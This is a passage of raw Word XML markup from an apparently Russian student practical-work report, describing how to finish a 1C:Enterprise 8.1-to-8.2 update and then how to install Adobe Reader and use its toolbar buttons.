            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="443" name="Рисунок 12" descr="http://ok-t.ru/studopedia/baza13/1714586139566.files/im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ok-t.ru/studopedia/baza13/1714586139566.files/image017.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId332" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2155730" cy="877658"/>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12- Окно запуск 1С Предприятия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14. Ставим галочку «Я подтверждаю легальность получения обновления» и нажимаем «Продолжить» рисунок 13:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2047350" cy="1464118"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="444" name="Рисунок 13" descr="http://ok-t.ru/studopedia/baza13/1714586139566.files/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ok-t.ru/studopedia/baza13/1714586139566.files/image019.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId333" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2047136" cy="1463965"/>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13- Окно проверки легальности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15. На этом обновление 1с 8 завершено рисунок 14:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2284950" cy="1338538"/>
            <wp:effectExtent l="19050" t="0" r="1050" b="0"/>
            <wp:docPr id="445" name="Рисунок 14" descr="http://ok-t.ru/studopedia/baza13/1714586139566.files/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ok-t.ru/studopedia/baza13/1714586139566.files/image021.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId334" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2284701" cy="1338392"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 14- Обновление завершено</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вывод</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В ходе данной практической работы был изучен процесс обновления программы 1С: Предприятие с версии 8.1. на версию 8.2. Был описан процесс копирования существующей базы данных, указан путь сохранения БД. С установкой обновления появятся дополнительные функции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Обновить программу Adobe Reader.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Скачать программу можно с официального сайта </w:t>
      </w:r>
      <w:hyperlink r:id="rId335" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://get.adobe.com/ru/reader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t>. Для установки проделываем следующие действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Заходим в папку с сохраненной программой, запускаем ее и соглашаемся с вопросом подтверждения. Для этого способа установки нужен подключенный и настроен интернет. Программа соединится со соим сервером и подкачает все нужные файлы. По завершении Вас перебросит на сайт компании и сообщит о успешной инсталяции программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Поговорим немного о программе в действии. Для примера возьму любой pdf файл, у меня 60% книг находятся в этом формате. Если у вас до этого не стояла никакая pdf читалка, тогда двойной клик откроет файл в adobe resder, но может быть у вас уже уставлен сторонний продукт, тогда нужно правым кликом по файлу вызвать подсвойственное меню Открыть с помощью, где выбираем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2284315" cy="696789"/>
            <wp:effectExtent l="19050" t="0" r="1685" b="0"/>
            <wp:docPr id="446" name="Рисунок 482" descr="Открытие pdf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descr="Открытие pdf документа"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId336" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2284628" cy="696884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Adobe Reader и запускаем файл. С левой стороны окна программы расположена панель навигации. Среди прочих возможностей можно просмотреть закладки, экскизы страниц. При клике на эти иконки приоткроется небольшое окно вдоль основного окна с документом. В котором будут отображены закладки или превю-миниатюры страниц. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Рассмотрим верхнее навигационное меню в открытом документе. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3170550" cy="340833"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="447" name="Рисунок 483" descr="верхнее навигацион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descr="верхнее навигационное меню"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId337" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3170747" cy="340854"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Опишем каждый значк в этой строке. некоторые активны только при выделенном тексе, а некоторые напрямую зависят от документа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273685" cy="302260"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="448" name="Рисунок 484" descr="Преобразовать фай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descr="Преобразовать файл"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId338" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273685" cy="302260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Часто нам нужно документ pdf преобразовать в файл читаемый, к примеру, в программе word или другом каком текстовом редакторе. Эта кнопка поможет вам это сделать, но не самим функционалом программы, а через сервис в интернете.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273685" cy="302260"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="449" name="Рисунок 485" descr="Дополнение прочими файл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descr="Дополнение прочими файлами"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId339" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273685" cy="302260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Чем-то схоже с первой, но здесь к уже существующему файлу pdf додается еще текст или изображение. Все это происходит также в онлайне и при платной подписке. Как первая, так и вторая возможность реализуема в более расширенном продукте компании adobe это Acrobat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273685" cy="302260"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="450" name="Рисунок 486" descr="Добавление тек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descr="Добавление текста"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId340" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273685" cy="302260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Здесь мы можем добавить любой текст в уже существующий документ. Это своего рода наложение на уже существующий документ. Может послужить как обращение внимания на какую-то деталь или картинку в вашем документе. Также можно с помощью этой кнопки сделать подпись в вашем доке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273685" cy="302260"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="451" name="Рисунок 487" descr="Сохранен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descr="Сохранение документа"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId341" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273685" cy="302260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>После всех изменений, которые вы при желании внесли в ваш документ его нужно конечно же сохранить. Для этого и существует эта вкладка. Если вы любите пользоваться клавиатурными сокращениями, тогда вам подойдет сокращение «Ctrl+S» – дествие аналогичное той кнопке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273685" cy="302260"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="452" name="Рисунок 488" descr="Печатать фай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descr="Печатать файл"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId342" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273685" cy="302260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Вы в любой момент можете распечатать ваш документ на принтере, если он конечно у вас имеется. Обратно же, при желании можно использовать клавиатурное сокращение «Ctrl+P». Советую вам запоминать и использовать сокращения. Это реально экономит время и не нужно искать часто спрятанные в ссылках возможности программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273685" cy="302260"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="453" name="Рисунок 489" descr="Отправка почт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descr="Отправка почтой"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId343" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273685" cy="302260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Иногда приходится отправлять файл почтой. для этого нам теперь не нужно выходить с программы, искать файл и отправлять. Достаточно нажать на эту иконку и нас перенаправит на почтовый клиент, с помощью которого мы и отправим данный файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="806450" cy="273685"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="454" name="Рисунок 490" descr="навигация по страниц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descr="навигация по страницам"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId344" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="806450" cy="273685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Здесь окно в котором отображается навигация станиц. Общее количество страниц и указание на которой странице вы находитесь. С помощью стрелочек мы перелистываем страницы. В поле активной страницы, можно ввести любую страницу и нажать Enter. Вас сразу на нее перенаправит.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="885825" cy="295275"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="455" name="Рисунок 491" descr="Размер шриф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descr="Размер шрифта"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId345" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="885825" cy="295275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Здесь мы можем указать размер нашего документа в процентах маштабности. При этом можно задать его в ручную, а также управлять знаком минус или плюс.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="504190" cy="273685"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="456" name="Рисунок 492" descr="Подгон стра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descr="Подгон страницы"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId346" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="504190" cy="273685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Первый ярлык – подгон страницы по ширине окна программы. Вам в этом случае будет доступна навигация и прокрутка построчно. Вторая – дает возможность страницу из документа разместить полностью в окне программы. Это приводит к уменьшению шрифта и потери читаемости. В этом случае навигация будет происходить постранично!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
